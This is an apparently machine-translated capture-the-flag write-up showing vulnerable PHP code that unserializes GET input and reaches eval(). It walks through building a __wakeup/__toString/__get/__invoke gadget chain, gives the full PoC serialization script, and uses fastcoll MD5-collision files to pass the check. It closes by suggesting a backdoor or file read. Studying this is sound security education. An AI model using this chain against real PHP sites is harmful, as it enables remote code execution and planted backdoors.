PHP Deserialization +MD5 Collision

Source code ：

<?phperror_reporting(0);highlight_file(__FILE__);class Backdoor {    public $x;    public $y;    public function __invoke(){        if( is_string($this->x) && is_string($this->y) && ($this->x != $this->y) && (md5($this->x) === md5($this->y)) ){           if(!preg_match("/\<\?/", $this->x, $match)){               eval($this->x);           } else {               die("No Way!");           }        } else {            die("Keep it up......");        }    }}class Entrance{    public $name;    public $str;    public function __construct(){        $this->name = "Bunny";    }    public function __toString(){        return $this->str->name;    }    public function __wakeup(){        echo 'Welcome, '.$this->name."<br>";    }}class Test{    public $z;    public function __construct(){        $this->z = array();    }    public function __get($key){        $function = $this->z;        return $function();    }}if (isset($_GET['poc'])){    unserialize($_GET['poc']);}?>

analysis ：

First , from unserialize It is obvious that this is about PHP The problem of deserialization , This kind of problem usually needs to find an entry first .
After checking the code , Soon found a PHP Magic methods __wakeup() .

__wakeup()：
unserialize() Will check if there is one __wakeup() Method . If there is , Will be called first __wakeup Method ,

Although this method simply outputs a sentence , But careful observation will find __wakeup() There is another one above the magic method __toString() The magic of .

__toString()：
The response method when a class is treated as a string .
__toString() How to respond when a class is treated as a string . for example echo $obj; What should be shown .

From this we can guess , You can assign this class to $this->name, This will trigger when he splices strings __toString() Magic methods .
Take a closer look at __toString The content of magic method ,$this->str->name, From this guess, we can assign a class to $this->str, Then go to that kind of name This variable .
Look back at the source code , Find out test There is one in the class __get() The magic of .

__get()：
PHP in __get(), Call when you get a member variable of a class
stay php In object oriented programming , The member property of the class is set to private after , If we try to call it outside, it will appear “ Cannot access a private property ” Error of . So in order to solve this problem , We can use magic __get().

Combine the above steps , We can give test Add a private variable to the class name, This will trigger when getting private variables __get() Magic methods .
Look again. __get() The content of magic method , He return One. $function(), and $function = $this->z, In this place, it is easy to think of operations performed by using classes as functions , Then check the code , It was found that __invoke() Magic methods .

__invoke()：
__invoke(), The response method when an object is called by calling a function
** effect ：**
When trying to call an object as a function ,__invoke() Method will be called automatically .
** Be careful ：**
This feature only exists in PHP 5.3.0 And above are valid .

__invoke() Magic method has filtering operation , It requires x and y The value of must be a string , Their two values are not equal , however MD5 The value should be the same , Finally, it will x As PHP Code to execute , That is what we will eventually use eval() function ！
The whole process is almost like this , If you can't see it directly , You can also look back and forward , That is to find places that may be used and push forward .

answer ：

structure poc chain

<?phpclass Entrance{    public $name;    public $str;}class Test{    public $z;    private $name;}class Backdoor {    public $x;    public $y;}$a=new Entrance();$b=new Test();$c=new Backdoor();$a->name=$a;    // Used to trigger tostring$a->str=$b;     // Used to trigger get$b->z=$c;       // Used to trigger invoke$c->x=file_get_contents("1_msg1.txt");$c->y=file_get_contents("1_msg2.txt");echo urlencode(serialize($a));// There will be invisible characters in plaintext output , So remember url Encoding ?>

The chain is not difficult , as long as 3 Step by step , This question is difficult at the end MD5 Hit this , Casually find two MD5 Strings with the same value are not difficult , But also treat this string as PHP Code to execute , It may not be easy .
It's definitely not good to try one by one , Here we have to use a tool fastcoll.

Download resources
Program ：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
Source code ：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip

The function of this tool is that you give him a string , He will output you two segments containing the string and MD5 Files with the same value , With this tool , This question is very simple .
Let's do a random test , use PHP Code output 99999.
First prepare a 1.txt, The content of the document is

echo 999999;

Drag the file to fastcoll.exe On , The program will automatically generate two paragraphs of text .
After checking the text, I found , The code is followed by many garbled strings , So we can add notes after the original document , So modify 1.txt

echo 999999;//

throw sth. into fastcoll Two files are generated in , Because there is garbled code in this file , So it is suggested to use file_get_contents To get the contents of the file .

test result ：

thus eval Function executed successfully , Finally, you can try to leave the back door , Or read the file directly .
author ：Sentry_fei

Game programming , A game development favorite ~

If the picture is not displayed for a long time , Please use Chrome Kernel browser .